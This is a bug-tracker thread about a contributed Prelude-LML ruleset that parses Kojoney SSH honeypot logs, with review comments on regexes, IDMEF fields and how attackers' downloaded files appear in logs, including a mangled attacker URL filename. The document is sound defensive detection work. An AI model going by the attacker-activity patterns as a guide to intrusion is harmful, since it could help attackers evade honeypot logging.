Bug #245

New LML-Ruleset for Kojoney SSH Honeypot - please review

Added by over 16 years ago. Updated almost 15 years ago.

Target version:
Start date:
Due date:
% Done:



kojoney.rules (6.43 KB) , 07/06/2007 04:35 PM

Associated revisions

Revision 3e90d0f7 (diff)
Added by Pierre Chifflier about 16 years ago

Add new ruleset for Kojoney honeypot (Closes #245).
Thanks to Bjoern Weiland for the initial submission.

git-svn-id: file:///home/yoann/dev/prelude/git/nok/SVN/prelude-lml/trunk@10089 09c5ec92-17d4-0310-903a-819935f44dba


#1 Updated by Yoann VANDOORSELAERE over 16 years ago

Thanks for this contribution!

Here are a few comments concerning the ruleset. Once the following issues are discussed and/or fixed, we will be able to include this ruleset within the LML distribution.

  • In case the software might report Ipv6 attack, it would be best to match the IP address using (\S+), and leaving address.category unspecified (Prelude-Manager Normalizer will take care of setting it appropriately).
  • Instead of setting the login within [[AdditionalData]], did you investigate whether setting it within target User/UserID (with category set to os-device) would be appropriate?
  • commandline should probably be spelled command line
  • (executing .*|COMMAND .*): The command is an interesting information that should be captured and assigned within an IDMEF field. Additionally, in case where executing is matched, you might want to set the target.process entry with the name of the process (and the path, if you are able to retrieve it).
  • Saved the file .*: No need for the wildcard here, you can just use:
    \[SSHChannel session \(\d+\) on SSHService ssh-connection on SSHServerTransport,\d+,([\d\.]+)\] Saved the file
  • Additionally, is there any reason you don't assign the saved filename information within the IDMEF message?
  • In all Kojoney log messages, what does the number following SSHServerTransport correspond to (example: SSHServerTransport,*3*)?

Hope this help,

#2 Updated by over 16 years ago

  • No Ipv6 here, either
  • The Login may be set within the mentioned field, as I said, currently I cannot test it as our systems are down. If you feel this would be the right place to put it, why not... I dont know where it would appear in Prelude though
  • Command line spelling can be changed
  • Command should be assigned to which IDMEF field?
  • There is a reason why i dont assign the saved filename, as it is getting obfuscated and does not relly look nice. One could think about it, though. Looks like http+_evilserver_xhost_ro_e_tgz300
  • The number in the log messages is some kind of ID, just an continuously increasing numbver for each connect

#3 Updated by Pierre Chifflier about 16 years ago

  • Status changed from New to Closed
  • Resolution set to fixed

(In r10089) Add new ruleset for Kojoney honeypot (Closes #245).
Thanks to Bjoern Weiland for the initial submission.

#4 Updated by Yoann VANDOORSELAERE almost 15 years ago

  • Project changed from PRELUDE SIEM to Prelude-LML
  • Category deleted (4)
  • Target version deleted (0.9.11)

Also available in: Atom PDF